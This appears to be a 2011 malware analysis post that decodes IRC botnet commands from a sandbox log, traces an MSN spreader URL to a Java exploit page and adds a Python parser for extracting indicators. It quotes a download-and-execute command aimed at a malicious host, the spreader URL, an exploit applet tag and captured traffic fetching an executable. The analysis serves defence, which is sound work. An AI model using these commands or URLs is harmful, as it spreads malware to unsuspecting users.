IRC Botnet Logs with MSN Spreader

We noticed the following details in a log file in our sandbox:

:m{IT|XXX}agaigyu!agaigyu@hostXXX.it JOIN :#ngr
:Apache2.0 332 m{IT|XXX}agaigyu #ngr :.j -c FRA,ESP,ITA #it .dl http://efirst-data. in/install.48208.exe .mod msn on .msn.int # .msn.set http://image4msn. com/
:Apache2.0 333 m{IT|XXX}agaigyu #ngr xxx 1301238177

These details come from an IRC botnet, and we can extract a few commands:

1. Bots whose country (-c) is FRA, ESP or ITA join the channel “#it”:

.j -c FRA,ESP,ITA #it

2. Download and execute a remote file:

.dl http://efirst-data. in/install.48208.exe

3. Enable module MSN spreader:

.mod msn on

4. Initialize MSN spreader:

.msn.int

5. Set MSN spreader URL:

.msn.set http://image4msn. com/
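Decoding these commands from raw log lines can be automated. The following is an added example (not code from the original post): it picks the command string out of the channel topic (IRC numeric 332), splits it on the verbs listed above and collects the download and spread URLs; the sample log is constructed from the lines quoted above, with the domains left defanged as the post prints them.

```python
import re
# Constructed from the IRC log quoted above; domains stay defanged (space after the dot) as the post prints them.
SAMPLE_LOG = """:m{IT|XXX}agaigyu!agaigyu@hostXXX.it JOIN :#ngr
:Apache2.0 332 m{IT|XXX}agaigyu #ngr :.j -c FRA,ESP,ITA #it .dl http://efirst-data. in/install.48208.exe .mod msn on .msn.int # .msn.set http://image4msn. com/
:Apache2.0 333 m{IT|XXX}agaigyu #ngr xxx 1301238177"""

# IRC numeric 332 (RPL_TOPIC): this botnet keeps its command string in the channel topic.
TOPIC_RE = re.compile(r"^:\S+ 332 \S+ (?P<chan>#\S+) :(?P<topic>.*)$")

# Command verbs seen in the post and what each means to the analyst.
KNOWN = {
    ".j": "join channel, optionally filtered by bot country",
    ".dl": "download and execute remote file",
    ".mod": "enable or disable a module",
    ".msn.int": "initialise MSN spreader",
    ".msn.set": "set URL sent to the victim's MSN contacts",
}

def split_commands(topic):
    """(verb, args) pairs; a new command starts only at a known verb, so a defanged URL with a space stays whole."""
    cmds = []
    for tok in topic.split():
        if tok in KNOWN:
            cmds.append((tok, []))
        elif cmds:
            cmds[-1][1].append(tok)
    return [(verb, " ".join(args)) for verb, args in cmds]

def parse_join(args):
    """'-c FRA,ESP,ITA #it' -> (['FRA', 'ESP', 'ITA'], '#it')."""
    toks = args.split()
    countries = []
    if len(toks) >= 2 and toks[0] == "-c":
        countries, toks = toks[1].split(","), toks[2:]
    return countries, (toks[0] if toks else "")

def extract_iocs(log):
    """Return the C2 channels, decoded commands and download/spread URLs found in raw IRC lines."""
    found = {"channels": [], "commands": [], "urls": []}
    for line in log.splitlines():
        m = TOPIC_RE.match(line)
        if not m:
            continue
        found["channels"].append(m.group("chan"))
        for verb, args in split_commands(m.group("topic")):
            found["commands"].append((verb, args, KNOWN[verb]))
            if verb in (".dl", ".msn.set"):
                found["urls"].append(args)
    return found
```

Feeding the whole sandbox log through extract_iocs gives the channel, the five decoded commands and the two URLs to block or hunt for.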

The victim now sends the malicious URL to all of their MSN contacts:

http://image4msn. com/

This URL serves a Java exploit, as the page source shows:

<body><applet code='mordor.saruman.class' archive='./games/plugins.jar'><param name='sko' value=[...]

Report 2011-03-28 14:19:39 (GMT 1)
File Name plugins-jar
File Size 9015 bytes
File Type Unknown file
MD5 Hash 7b0418be80084558cf34f6bdc2d5b112
SHA1 Hash 727d343bfd8f5bb970df10fed97eccb9562ac634
Detections: 0 / 9 (0 %)
Status CLEAN

This is a screenshot of the malicious URL when visited:

[Image]

An unprotected directory listing reveals the existence of other files (an exploit kit):

[Image]

Network traffic:

GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com
 
POST /objects/ocget.dll HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: activex.microsoft. com
 
GET /d.php?f=18&e=0 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com

An executable file (PE) is downloaded:

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 12:22:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Pragma: public
Expires: Mon, 28 Mar 2011 12:22:17 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 91280
Connection: close
Content-Type: application/x-msdownload

MZ